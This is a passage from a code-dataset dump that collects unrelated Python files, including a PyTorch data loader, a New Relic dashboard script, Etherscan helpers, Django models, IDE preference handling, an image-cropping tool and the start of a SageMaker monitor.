print('自定义排序:\\t{}'.format(list_test))","sub_path":"数据结构与算法/10_希尔排序.py","file_name":"10_希尔排序.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150213399","text":"# encoding: utf-8\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom .datasets import init_dataset, ImageDataset, ImageNoLabelDataset\nfrom .triplet_sampler import RandomIdentitySampler\nfrom .transforms import build_transforms\n\n# ASK :\ndef train_collate_fn(batch):\n imgs, pids, _, _, = zip(*batch)\n pids = torch.tensor(pids, dtype=torch.int64)\n return torch.stack(imgs, dim=0), pids\n\ndef val_collate_fn(batch):\n imgs, pids, camids, _ = zip(*batch)\n return torch.stack(imgs, dim=0), pids, camids\n\ndef val_no_label_collate_fn(batch) :\n imgs, camids, dates, _ = zip(*batch)\n return torch.stack(imgs, dim=0), camids, dates\n\ndef make_data_loader(cfg):\n transforms = build_transforms(cfg)\n dataset = init_dataset(cfg.DATASETS.NAMES, root=cfg.DATASETS.ROOT_DIR)\n num_workers = cfg.DATALOADER.NUM_WORKERS\n if cfg.VISUALIZE.OPTION == \"on_no_label\" :\n gallery_set = ImageNoLabelDataset( dataset.gallery, transforms['eval'])\n print(gallery_set.dataset[0])\n data_loader={}\n data_loader['gallery'] = DataLoader(\n gallery_set, batch_size=cfg.VISUALIZE.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_no_label_collate_fn\n )\n return data_loader\n # number of identities\n num_classes = dataset.num_train_pids\n train_set = ImageDataset(dataset.train, transforms['train'])\n data_loader={}\n # ASK : what is PK_SAMPLER, collate_fm\n if cfg.DATALOADER.PK_SAMPLER == 'on':\n data_loader['train'] = DataLoader(\n train_set, batch_size=cfg.SOLVER.IMS_PER_BATCH,\n sampler=RandomIdentitySampler(dataset.train, cfg.SOLVER.IMS_PER_BATCH, cfg.DATALOADER.NUM_INSTANCE),\n num_workers=num_workers, collate_fn=train_collate_fn\n )\n else:\n data_loader['train'] = DataLoader(\n train_set, batch_size=cfg.SOLVER.IMS_PER_BATCH, shuffle=True, num_workers=num_workers,\n collate_fn=train_collate_fn\n )\n\n eval_set = ImageDataset(dataset.query + dataset.gallery, transforms['eval'])\n data_loader['eval'] = DataLoader(\n eval_set, batch_size=cfg.TEST.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_collate_fn\n )\n if cfg.VISUALIZE.OPTION == \"on\" and cfg.EMBEDDING_PROJECTOR.OPTION == \"off\" :\n query_set = ImageDataset(dataset.query , transforms['eval'])\n gallery_set = ImageDataset( 
dataset.gallery, transforms['eval'])\n data_loader['query'] = DataLoader(\n query_set, batch_size=cfg.VISUALIZE.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_collate_fn\n )\n data_loader['gallery'] = DataLoader(\n gallery_set, batch_size=cfg.VISUALIZE.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_collate_fn\n )\n \n return data_loader, len(dataset.query), num_classes\n","sub_path":"data/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"453389950","text":"# ==================================================\n# CONTENTS\n # Overview\n # Chat Bot\n# ==================================================\n\n\n# Overview\ndef read_file( filepath ):\n with open( filepath ) as f:\n str_text = f.read()\n\n return str_text\n\n# read_file( '.\\\\docs\\\\moby_dick_four_chapters.txt' )\nimport spacy \n\nnlp = spacy.load( 'en', disable = [ 'parser', 'tagger', 'ner' ] )\nnlp.max_length = 1198623\n\ndef seperate_punctuation( doc_text ):\n return [ token.text.lower() for token in nlp( doc_text ) if token.text not in '\\n\\n \\n\\n\\n!\"-#$%&()--.*+,-/:;<=>?@[\\\\]^_`{|}~\\t\\n ' ]\n\nd = read_file( '.\\\\docs\\\\moby_dick_four_chapters.txt' )\ntokens = seperate_punctuation( d )\n\n# Predict next word from previously supplied words\ntrain_len = 25 + 1\n\ntext_sequences = []\n\nfor i in range( train_len, len(tokens) ):\n seq = tokens[ i - train_len:i ]\n text_sequences.append( seq )\n\nfrom keras.preprocessing.text import Tokenizer\n\ntokenizer = Tokenizer()\n\ntokenizer.fit_on_texts( text_sequences )\nsequences = tokenizer.texts_to_sequences( text_sequences )\n\nfor i in sequences[0]:\n print( f'{i} : {tokenizer.index_word[i]}' )\n\nvocabulary_size = len( tokenizer.word_counts )\nvocabulary_size\n\nimport numpy as np \n\nsequences = np.array( sequences )\nsequences\n\n\n# Chat Bot\n# ==================================================\n","sub_path":"notebooks/nltk/deep_learning_nlp.py","file_name":"deep_learning_nlp.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"497782869","text":"#!/usr/bin/python\n\nimport json\nimport requests\nimport re\nfrom widgets.markdown import markdown_test\nfrom widgets.apm_errors import apmErrorGraph\nfrom widgets.apm_apdex import apmApdex\nfrom widgets.db_cpu_usage import dbCPUUsage\nfrom widgets.db_mem_usage import dbMemUsage\nfrom widgets.db_disk_usage import dbDiskUsage\n\ndef setoverviewdashboard(project, tier, key):\n API_ENDPOINT = 'https://api.newrelic.com/graphql'\n headers = {\n \"Api-Key\": key,\n \"Content-Type\": \"application/json\"\n }\n\n def getDashboard():\n # search for existing dashboards with the same name \n data = {'query':'{actor {'\n 'entitySearch(query: \"name = \\'' + project.title() + ' Overview: ' + tier.lower() + '\\' AND type IN (\\'DASHBOARD\\')\") {'\n 'results {'\n 'entities {'\n 'guid,'\n '}'\n '}'\n '}'\n '}}'}\n\n try:\n response = requests.post(API_ENDPOINT, headers=headers, data=json.dumps(data), allow_redirects=False)\n except requests.exceptions.RequestException as e:\n raise SystemExit(e)\n\n return(re.search('\"guid\":\"(.*)\"', response.text))\n\n # Set Dashboard Data - this is the data that will be added to the overview dashboard\n # markdown widget\n markdownWidget = markdown_test(project, tier)\n\n # APM errors\n apmErrorWidget = apmErrorGraph(project, tier, 
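# The collate functions in the data loader above rely on zip(*batch) to
# transpose a list of per-sample tuples into per-field tuples. The idiom in
# isolation, with made-up sample values:
batch = [("img0", 3, "cam0"), ("img1", 7, "cam1")]
imgs, pids, camids = zip(*batch)
print(imgs)    # ('img0', 'img1')
print(pids)    # (3, 7)
print(camids)  # ('cam0', 'cam1')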
key)\n # APM apdex\n apmApdexWidget = apmApdex(project, tier, key)\n\n # DB CPU Usage\n dbCPUUsageWidget = dbCPUUsage(project, tier)\n # DB Memeory Usage\n dbMemUsageWidget = dbMemUsage(project, tier)\n # DB Disk Usage\n dbDiskUsageWidget = dbDiskUsage(project, tier)\n\n dash_data = ', dashboard: {'\\\n 'name: \"' + project.title() + ' Overview: ' + tier.lower() + '\",'\\\n 'permissions: PUBLIC_READ_ONLY,'\\\n 'pages: {'\\\n 'name: \"page_1\",'\\\n 'widgets: ['\\\n '' + markdownWidget + ','\\\n '' + apmErrorWidget + ','\\\n '' + apmApdexWidget + ','\\\n '' + dbCPUUsageWidget + ','\\\n '' + dbMemUsageWidget + ','\\\n '' + dbDiskUsageWidget + ''\\\n ']'\\\n '}'\\\n '}){'\\\n 'errors {'\\\n 'description,'\\\n 'type'\\\n '}'\\\n '}'\\\n '}'\n\n dash_guid = getDashboard()\n\n # set the query type for update or create\n if dash_guid:\n queryType = 'dashboardUpdate(guid: \"' + dash_guid.group(1) + '\"'\n pageGuid = dash_guid.group(1)\n else:\n queryType = 'dashboardCreate(accountId: 2292606'\n\n data = {'query':'mutation {' + queryType + dash_data}\n\n try:\n response = requests.post(API_ENDPOINT, headers=headers, data=json.dumps(data), allow_redirects=False)\n except requests.exceptions.RequestException as e:\n raise SystemExit(e)\n\n print('Dashboard added: {} {} Overview'.format(project, tier))","sub_path":"monitoring/dashboards/set_overview.py","file_name":"set_overview.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"396222633","text":"from etherscan.transactions import Transactions\r\nimport json\r\n\r\nwith open('C:/Yiru Xiong-Professional/实习/CryptoAlgoWheel/S1/task3/api_key.json', mode='r') as key_file:\r\n key = json.loads(key_file.read())['key']\r\n\r\n\r\ndef get_status(tx_hash):\r\n api = Transactions(api_key=key)\r\n status = api.get_status(tx_hash=tx_hash)\r\n print(status)\r\n# get_status('0x15f8e5ea1079d9a0bb04a4c58ae5fe7654b5b2b4463375ff7ffb490aa0032f3a')\r\n\r\n\r\ndef get_tx_receipt_status(tx_hash):\r\n api = Transactions(api_key=key)\r\n receipt_status = api.get_tx_receipt_status(tx_hash=tx_hash)\r\n print(receipt_status)\r\n# get_tx_receipt_status('0x513c1ba0bebf66436b5fed86ab668452b7805593c05073eb2d51d3a52f480a76')\r\n","sub_path":"section1/task3/S1_task3_transactions.py","file_name":"S1_task3_transactions.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"599106651","text":"sugar = int(input())\n\nif 3 < sugar < 5:\n print(\"-1\")\n\nelif sugar % 5 == 0 :\n print(sugar//5)\n\nelif sugar % 3 == 0 :\n if sugar < 10:\n print(sugar//3)\n else:\n for i in range(sugar):\n k = sugar - 5*i\n if 3<= k < 5:\n break\n print(i)\n\nelse:\n for i in range(sugar):\n k = sugar - 5*i #5로 나눈 나머지 값 -> sugar%5\n if k % 3 == 0 :\n print(i + k//3 )\n break\n else:\n print(\"-1\")\n break\n\n\n\n\nn = int(input())\n# 초기화\nfive = 0\nthree = 0\n \n# 최대 5kg의 갯수와 나머지를 구한다.\nfive = n//5\nb = n%5\n \n# 나머지가 0이 아니면 3kg 갯수를 구한다.\nif b !=0:\n while five >= 0:\n if b%3 == 0:\n three = b//3\n break\n five -= 1 #5로 나눈 나머지 값이 3의 배수가 아니면 -1 될때까지 빼준다\n b += 5 # 나머지가 3으로 나누어 떨어질때 까지 5를 더해서 다시 구한다.어떻게 이런 생각을?\n \nret=five + three\n \nif ret < 1:\n ret = -1\nprint(ret)\n\n\n\n# sugar = int(input())\n\n# k = sugar//5\n# j = sugar%5\n\n# if j != 0:\n# bag = 0\n# if j%3 == 0 :\n# bag = j //3\n# print(k + bag)\n \n# elif sugar%3 == 0 :\n# print(sugar//3)\n \n# elif\n \n# else:\n# print(\"-1\")\n\n# else:\n# print(k)\n 
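# The trial-and-error variants in the sugar snippet around this point all
# circle one clean formulation of the 3kg/5kg bag problem: take as many 5kg
# bags as possible, then trade them back one at a time until the remainder
# divides by 3. A compact sketch (illustrative, not from the original file):
def min_bags(n):
    fives = n // 5
    while fives >= 0:
        rest = n - 5 * fives
        if rest % 3 == 0:
            return fives + rest // 3
        fives -= 1
    return -1

assert min_bags(18) == 4   # 5+5+5+3
assert min_bags(6) == 2    # 3+3
assert min_bags(4) == -1   # impossible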
\n\n\n\n\n\n\n\n# order = int(input())\n\n# if order % 5 == 0:\n# print(order // 5)\n\n# elif order % 5 == 3:\n# print(order // 5 + 1)\n\n# elif order // 5 - 1 >= 0 and order - (5 * (order // 5 - 1)) == 6:\n# print((order // 5 - 1) + 2)\n\n# elif order // 5 - 1 >= 0 and order - (5 * (order // 5 - 1)) == 9:\n# print((order // 5 - 1) + 3)\n\n# elif order // 5 - 2 >= 0 and order - (5 * (order // 5 - 2)) == 12:\n# print((order // 5 - 2) + 4)\n\n# else:\n# print(-1)\n\n\n\n\n\n\n\n\na = int(input())\nbox = 0\nwhile True:\n if a%5 ==0:\n box = box + (a//5)\n print(box)\n break\n a = a - 3\n box += 1\n if a < 0:\n print(\"-1\")\n break\n\n\n\n\n\n\n# def sugar(N) :\n# for y in range( (N//3)+1) :\n# for x in range( (N//5)+1 ) :\n# if ((5*x + 3*y) == N) :\n# return x+y\n \n# return -1\n\n# N = int(input()) #배달해야할 설탕 킬로그램 \n# print(sugar(N))\n","sub_path":"sugar.py","file_name":"sugar.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197013949","text":"#-*- coding: utf-8 -*-\nfrom django.db import models\nfrom redko.functions import day_to_string, minute_to_string\n\nfrom shop.models import Shop\nfrom member.models import RedkoUser as User\n\n'''제휴추천'''\nclass Recommend(models.Model):\n shopname = models.CharField('가게명', max_length=200)\n location = models.CharField('대략적 위치', max_length=200)\n reason = models.TextField('추천 이유', blank=True)\n user = models.ForeignKey(User)\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return '%s (%s) : %s' % (self.shopname, self.location, self.reason)\n def json(self):\n dict = {\n 'id': self.id,\n 'shopname': self.shopname,\n 'reason': self.reason,\n }\n class Meta:\n verbose_name = u'제휴 추천'\n verbose_name_plural = u'제휴 추천 목록'\n ordering = ['-created']\n\n'''불량 콘텐츠'''\nclass BadContent(models.Model):\n user = models.ForeignKey(User, related_name='user_set')\n bad_user = models.ForeignKey(User, related_name='bad_user_set')\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return u'FromUser(%s) - BadUser(%s)' % (self.user, self.bad_user)\n class Meta:\n verbose_name = u'불량 콘텐츠'\n verbose_name_plural = u'불량 콘텐츠 목록'\n ordering = ['-created']\n\n'''잘못된 정보'''\nclass BadInfo(models.Model):\n shop = models.ForeignKey('shop.Shop')\n user = models.ForeignKey(User)\n bad_info = models.TextField('잘못된 정보', blank=True)\n correct_info = models.TextField('정정된 정보', blank=True)\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return u'%s (User:%s)' % (self.shop.title, self.user)\n class Meta:\n verbose_name = u'잘못된 정보'\n verbose_name_plural = u'잘못된 정보 목록'\n ordering = ['-created']\n\n'''불편 신고'''\nclass Discomfort(models.Model):\n user = models.ForeignKey(User)\n shop = models.ForeignKey(Shop)\n type = models.CharField(max_length=200, blank=True)\n content = models.TextField(blank=True)\n created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name = u'불편 신고'\n verbose_name_plural = u'불편 신고 목록'\n ordering = ['-created']","sub_path":"support/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82453072","text":"\"\"\"Programmatic interface to default and user-defined preferences.\n\nSee the preferences documentation for more info.\"\"\"\n\nfrom __future__ import print_function\n\nimport collections\nimport cPickle as pickle\nimport os\nimport 
tempfile\nimport threading\nfrom contextlib import contextmanager\nfrom itertools import dropwhile\nfrom os.path import join, pardir, isdir, isfile, dirname\nfrom pprint import pprint\n\nimport plat\nimport settings\nfrom plat import OS, OSX, WINXP, LINUX32, LINUX64\nfrom plat import USER_PREFS_FILE as user_prefs\nfrom util import die\n\nif OS == OSX: import _prefs_osx as _plat_prefs\nelif OS == WINXP: import _prefs_winxp as _plat_prefs\nelif OS == LINUX32: import _prefs_linux32 as _plat_prefs\nelif OS == LINUX64: import _prefs_linux64 as _plat_prefs\nelse: die('unknown OS: {0}', OS)\n\n_DEBUG = False\n\n# -- Locking primitives ------------------------------------------------------#\n\ndef __pref_locked():\n # python closures suck\n lock = [threading.Lock()]\n def pref_locked():\n lock[0].acquire()\n try:\n yield\n except:\n raise\n finally:\n lock[0].release()\n return pref_locked\n\n# Context manager for acquiring the lock, doing something, releasing it\npref_locked = contextmanager(__pref_locked())\n\ndef pref_atomic(f):\n def atomic(*args, **kwargs):\n with pref_locked():\n return f(*args, **kwargs)\n return atomic\n\n# -- Thread-safe functions ---------------------------------------------------#\n\n@pref_atomic\ndef preference(key):\n global _prefs\n return _prefs[key]\n\n@pref_atomic\ndef preference_with_default(key, default):\n global _prefs\n try: return _prefs[key]\n except: return default\n\n@pref_atomic\ndef has_preference(key):\n global _prefs\n return key in _prefs\n\n@pref_atomic\ndef save():\n global _prefs\n _unsafe_save_prefs()\n\n@pref_atomic\ndef set_and_save(pref_dict):\n global _prefs\n global _watchers\n delta = {}\n for pref, val in pref_dict.iteritems():\n if val != _prefs[pref]:\n _prefs[pref] = val\n delta[pref] = val\n if delta:\n if _DEBUG: print('delta:', delta)\n _unsafe_save_prefs()\n for w in _watchers:\n if hasattr(w, 'preferences_changed'):\n w.preferences_changed(delta)\n else:\n w(delta)\n elif _DEBUG:\n print('no delta')\n\n@pref_atomic\ndef register_change_watcher(watcher):\n \"\"\"Register a change listener on the user preferences.\n\n This can be an object with a callable 'preferences_changed'\n attribute, or a callable. When user preferences get changed\n through the use of this module, either the\n watcher.preferences_changed gets called, or, if that doesn't\n exist, watcher itself is called, with argument a dictionary from\n the changed preferences to their new values.\n\n Try not to use this; do so only if you're interacting with some\n third party code that needs to keep current.\"\"\"\n global _watchers\n _watchers.append(watcher)\n\n# -- Global defaults (platform-specific in _plat_prefs) ----------------------#\n\n# General info for a preferences.\n#\n# desc: (Short) string description\n#\n# help: Longer description\n#\n# group: Preference group ('Compilation', 'General', etc.)\n#\n# type: Kind of preference, (currently) one of: ['path', 'dir',\n# 'bool', 'int', 'options']. The last of these ('options') has a\n# \"values\" key in its extra data.\n#\n# advanced: counts as an advanced preference\n#\n# data: Extra data associated with the preference.\n#\n# pickle: whether or not to pickle this preference (FIXME this is dumb\n# and exists only for the build directory; the preference should be\n# \"use my build directory or not\", and if so, then etc. 
same for \"use\n# my make\")\npcfg = collections.namedtuple('pcfg',\n ' '.join(['desc', 'help', 'group', 'type',\n 'advanced', 'pickle', 'data']))\n\nPREF_CONFIG = \\\n{'build_dir':\n pcfg(u'Parent build directory',\n u'When a sketch is compiled, its build directory will be a ' + \\\n u'child of this directory.',\n u'Compilation', 'dir', False, False, {}),\n\n 'build_dir_delete_on_exit':\n pcfg(u'Delete parent build directory on exit',\n u'If enabled, deletes the parent build directory on IDE exit.',\n u'General', 'bool', False, True, {}),\n\n 'editor_emacs_keybindings':\n pcfg(u'Emacs keybindings',\n u'Enable some Emacs-style keybindings in the editor.',\n u'Editor', 'bool', False, True, {}),\n\n 'editor_insert_tabs':\n pcfg(u'Allow tabs',\n u'Whether or not the editor will insert literal TAB characters. '\n u'If disabled, the editor will insert an equivalent number of '\n u'spaces when the TAB key is pressed.',\n u'Editor', 'bool', False, True, {}),\n\n 'editor_tab_indents_line':\n pcfg(u'Tab indents line',\n u'If enabled pressing the tab key will indent the line, rather '\n u'than inserting a tab character or equivalent number of spaces.',\n u'Editor', 'bool', False, True, {}),\n\n 'editor_tab_width':\n pcfg(u'Tab width', u'Number of spaces to display for one tab.',\n u'Editor', 'int', True, True, {}),\n\n 'lib_maple_home':\n pcfg(u'libmaple home',\n u'Path to the libmaple source tree to compile against. '\n u'Default is the version bundled with MapleIDE, which has the '\n u'same version number as the IDE itself.',\n u'Compilation', 'dir', False, True, {}),\n\n 'make_path':\n pcfg(u'Path to make',\n u'Absolute path to the make executable. '\n u'Default is the version bundled with MapleIDE. '\n u'\\n\\n'\n u\"Make is a program used during compilation. 
If you're \"\n u\"unfamiliar with it, the default is probably best.\",\n u'Compilation', 'path', False, True, {}),\n\n 'board':\n pcfg(u'Board', u'Default board to compile to.',\n 'Compilation', 'options', True, True,\n {'values': [u'Maple', u'Maple Mini', u'Maple Native']}),\n\n 'memory_target':\n pcfg(u'Memory Target',\n u'Default for where the compiled sketch will reside on your board.',\n u'Compilation', 'options', True, True,\n {'values': [u'RAM', u'Flash']}),\n\n 'sketchbook':\n pcfg(u'Sketchbook', u\"Directory containing your sketches.\",\n u'General', 'dir', True, True, {}),\n\n 'user_libs':\n pcfg(u'Libraries', u\"Directory containing your extra libraries.\",\n u'General', 'dir', True, True, {}),\n }\n\n# Defaults delayed in order to prevent unintended side effects.\n_global_defaults = {\n 'build_dir': lambda: tempfile.mkdtemp(prefix=u'maple-build'),\n 'build_dir_delete_on_exit': lambda: True,\n 'editor_emacs_keybindings': lambda: False,\n 'editor_insert_tabs': lambda: False,\n 'editor_tab_indents_line': lambda: False,\n 'editor_tab_width': lambda: 4,\n 'lib_maple_home': lambda: join(settings.DEPENDENCIES_DIR, u'libmaple'),\n 'make_path': lambda: join(settings.DEPENDENCIES_DIR,\n plat.OS, u'make', u'bin', u'make'),\n 'board': lambda: 'Maple',\n 'memory_target': lambda: 'Flash'\n }\n\n# -- Unsafe functions --------------------------------------------------------#\n\ndef _unsafe_load_prefs(): # TODO error handling\n # assumes you've got the lock already\n pref_dict = {}\n\n defaults = _global_defaults.copy()\n defaults.update(_plat_prefs.platform_defaults)\n\n if not isfile(user_prefs):\n # no user prefs, force all delays\n for p in PREF_CONFIG: pref_dict[p] = defaults[p]()\n\n # make a new user prefs file, at least the parts we want\n _unsafe_save_prefs(pref_dict)\n\n if _DEBUG:\n print('pickled prefs:')\n pprint(to_pickle)\n\n else:\n with open(user_prefs, 'rb') as f_in:\n user_dict = pickle.load(f_in)\n\n for p in PREF_CONFIG:\n if p in user_dict: pref_dict[p] = user_dict[p]\n else: pref_dict[p] = defaults[p]()\n\n if _DEBUG:\n print('all prefs:')\n pprint(pref_dict)\n\n return pref_dict\n\ndef _unsafe_save_prefs(pref_dict=None):\n if pref_dict is None:\n global _prefs\n pref_dict = _prefs\n if not isdir(dirname(user_prefs)): os.makedirs(dirname(user_prefs))\n\n to_pickle = dict((p, v) for (p, v) in pref_dict.iteritems() \\\n if PREF_CONFIG[p].pickle)\n\n if _DEBUG:\n print('saving preferences:', to_pickle)\n\n with open(user_prefs, 'wb') as f_out:\n pickle.dump(to_pickle, f_out)\n\n# -- Initialization ----------------------------------------------------------#\n\nwith pref_locked():\n _prefs = _unsafe_load_prefs()\n\n# change listeners; they get notified when a preference changes\n_watchers = []\n","sub_path":"src/settings/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322647998","text":"from .... import level\nfrom .... import base\nclass lvl(level.level):\n def __init__(self, manager, index):\n level.level.__init__(self, manager, index)\n self.blocks[\"#\"] = base.stone\n self.blocks[\">\"] = base.stairsDown\n self.blocks[\"<\"] = base.stairsUp\n self.blocks[\"w\"] = base.woodFloor\n self.levelimp = \"\"\"\\\n############\n# www#\n# #\n# ? 
> #\n# #\n# #\n# #\n# C #\n# #\n# #\n# #\n############\"\"\"\n self.messageBox = base.messageBox((3 * 32, 3 * 32), self.index)\n self.messageBox.msg = \"\"\"\\\nWelcome to Evergreen!\nYou probably already know the controls if you managed\nto hit the block, but here goes nothing:\nWASD - Move\nSpace - Attack/Interact\nAnd that's it. This is really the most redundant help\nmessage ever, as in order to see it you need the information\nthat it contains. Maybe later we can have nicer things.\nAnyway, try walking over to the down portal (the red portal\norb thing) and interacting with it.\"\"\"\n self.blockState.add(self.messageBox)\n self.loadLevel()\n","sub_path":"trunk/src/server/levels/intro/floor1.py","file_name":"floor1.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354737493","text":"from PIL import Image as pilIm\nfrom PySide6.QtGui import QImage, qRgb\n\n\n# Default sizes for images\nORIG_SCALED_SIZE = (250, 250)\nCROPPED_SCALED_SIZE = (250, 250)\n\nKNOWN_CONCENTRATION = -1\nUNITS = ''\n\n\n# A class that stores the entries of an image\nclass Image:\n\n UNSPECIFIED_IMAGE = \"UNSPECIFIED\"\n BLANK_VOLUME = \"BLANK_VOLUME\"\n STANDARD_VOLUME = \"STANDARD_VOLUME\"\n\n MOST_RECENT_MAX_X = -1\n MOST_RECENT_MIN_X = -1\n MOST_RECENT_MAX_Y = -1\n MOST_RECENT_MIN_Y = -1\n\n def __init__(self, file_name, volume=0):\n self.file_name = file_name\n\n self.min_x = Image.MOST_RECENT_MIN_X\n self.min_y = Image.MOST_RECENT_MIN_Y\n self.max_x = Image.MOST_RECENT_MAX_X\n self.max_y = Image.MOST_RECENT_MAX_Y\n\n self.volume = volume\n\n self.avg_value = (-1, -1, -1)\n\n def set_coordinates(self, min_x, min_y, max_x, max_y):\n if min_x >= max_x or min_y >= max_y:\n raise ValueError\n self.min_x = min_x\n self.min_y = min_y\n self.max_x = max_x\n self.max_y = max_y\n Image.MOST_RECENT_MAX_Y = max_y\n Image.MOST_RECENT_MIN_Y = min_y\n Image.MOST_RECENT_MAX_X = max_x\n Image.MOST_RECENT_MIN_X = min_x\n self.compute_avg_color()\n\n def is_valid_coordinates(self):\n im = pilIm.open(self.file_name)\n return 0 <= self.min_x < self.max_x < im.size[1] and 0 <= self.min_y < self.max_y < im.size[0]\n\n def set_volume(self, volume):\n self.volume = volume\n\n def compute_avg_color(self):\n im = pilIm.open(self.file_name)\n cropped = im.crop((self.min_x, self.min_y, self.max_x, self.max_y))\n\n pixels = cropped.load()\n red = 0\n green = 0\n blue = 0\n for i in range(cropped.size[0]):\n for j in range(cropped.size[1]):\n red += pixels[i, j][0]\n green += pixels[i, j][1]\n blue += pixels[i, j][2]\n\n pix_count = cropped.size[0] * cropped.size[1]\n self.avg_value = (red / pix_count, green / pix_count, blue / pix_count)\n\n def get_original(self):\n return pilIm.open(self.file_name)\n\n def get_marked_scaled_original(self):\n if not self.is_valid_coordinates():\n return self.get_scaled_original()\n else:\n orig = self.get_original()\n scaled = self.get_scaled_original()\n pix = scaled.load()\n\n max_x = int(self.max_x / orig.size[1] * scaled.size[1])\n min_x = int(self.min_x / orig.size[1] * scaled.size[1])\n\n max_y = int(self.max_y / orig.size[0] * scaled.size[0])\n min_y = int(self.min_y / orig.size[0] * scaled.size[0])\n\n for i in range(scaled.size[1]):\n pix[min_x, i] = (0, 0, 0)\n pix[max_x, i] = (0, 0, 0)\n for j in range(scaled.size[0]):\n pix[j, min_y] = (0, 0, 0)\n pix[j, max_y] = (0, 0, 0)\n return scaled\n\n def get_cropped(self):\n if not self.is_valid_coordinates():\n return self.get_original()\n else:\n 
return self.get_original().crop((self.min_x, self.min_y, self.max_x, self.max_y))\n\n def get_scaled_original(self, scale=ORIG_SCALED_SIZE):\n im = self.get_original()\n scaling_factor = max(im.size[0], im.size[1])\n scaled_x = scale[0] * im.size[0] // scaling_factor\n scaled_y = scale[1] * im.size[1] // scaling_factor\n return im.resize((scaled_x, scaled_y))\n\n def get_scaled_cropped(self, scale=CROPPED_SCALED_SIZE):\n im = self.get_cropped()\n scaling_factor = max(im.size[0], im.size[1])\n scaled_x = scale[0] * im.size[0] // scaling_factor\n scaled_y = scale[1] * im.size[1] // scaling_factor\n return im.resize((scaled_x, scaled_y))\n\n\nblank = Image.UNSPECIFIED_IMAGE\nstandard = Image.UNSPECIFIED_IMAGE\nmid_images = []\n\n\ndef clear_images():\n global blank\n global standard\n global mid_images\n blank = Image.UNSPECIFIED_IMAGE\n standard = Image.UNSPECIFIED_IMAGE\n mid_images = []\n\n\ndef add_blank(image):\n global blank\n blank = image\n\n\ndef add_standard(image, concentration, units):\n global standard\n global KNOWN_CONCENTRATION\n global UNITS\n\n standard = image\n KNOWN_CONCENTRATION = concentration\n UNITS = units\n\n\ndef add_image(image):\n global mid_images\n mid_images.append(image)\n\n\ndef get_pix_map(image):\n pix = image.load()\n q_image = QImage(image.size[0], image.size[1], QImage.Format_RGB32)\n for i in range(image.size[0]):\n for j in range(image.size[1]):\n # build the pixel from its red, green and blue channels\n value = qRgb(pix[i, j][0], pix[i, j][1], pix[i, j][2])\n q_image.setPixel(i, j, value)\n return q_image\n\n\ndef get_state():\n if not mid_images:\n return \"No images other than your blank and standard have been added.\"\n else:\n ret_str = \"\"\n for i in range(len(mid_images)):\n sub_str = 'Image ' + str(i + 1) + ':\\t'\n sub_str += 'Concentration:\\t' + str(mid_images[i].volume) + '\\t'\n sub_str += 'File Name:\\t' + mid_images[i].file_name\n ret_str += sub_str\n if i + 1 < len(mid_images):\n ret_str += '\\n'\n return ret_str\n\n\n# GENERATE CROPPED:\n# cropped = im.crop((self.min_x, self.min_y, self.max_x, self.max_y))\n# GENERATE SCALED:\n# scaling_factor = max(im.size[0], im.size[1])\n# scaled_orig_x = ORIG_SCALED_SIZE[0] * im.size[0] // scaling_factor\n# scaled_orig_y = ORIG_SCALED_SIZE[1] * im.size[1] // scaling_factor\n# scaled_orig = im.resize((scaled_orig_x, scaled_orig_y))\n# GENERATE SCALED CROPPED:\n# Like, both at once dummy\n","sub_path":"ImageManager.py","file_name":"ImageManager.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139006798","text":"from collections import namedtuple\nfrom datetime import timedelta\nfrom future.utils import with_metaclass\nimport abc\nimport boto3\nimport logging\nimport pprint\nimport time\n\nfrom parallelm.common.cached_property import cached_property\nfrom parallelm.common.mlcomp_exception import MLCompException\nfrom parallelm.common.os_util import utcnow\nfrom parallelm.extra.sagemaker.monitor.report import Report\nfrom parallelm.extra.sagemaker.monitor.sm_api_constants import SMApiConstants\n\n\nclass JobMonitorBase(with_metaclass(abc.ABCMeta, object)):\n MONITOR_INTERVAL_SEC = 10.0\n ONLINE_METRICS_FETCHING_NUM_RETRIES = 1\n FINAL_METRICS_FETCHING_NUM_RETRIES = 36\n SLEEP_TIME_BETWEEN_METRICS_FETCHING_RETRIES_SEC = 5.0\n\n MetricMeta = namedtuple('MetricMeta', ['id', 'metric_name', 'stat'])\n\n def __init__(self, sagemaker_client, job_name, logger):\n self._logger = logger\n self._sagemaker_client = sagemaker_client\n self._job_name = job_name\n 
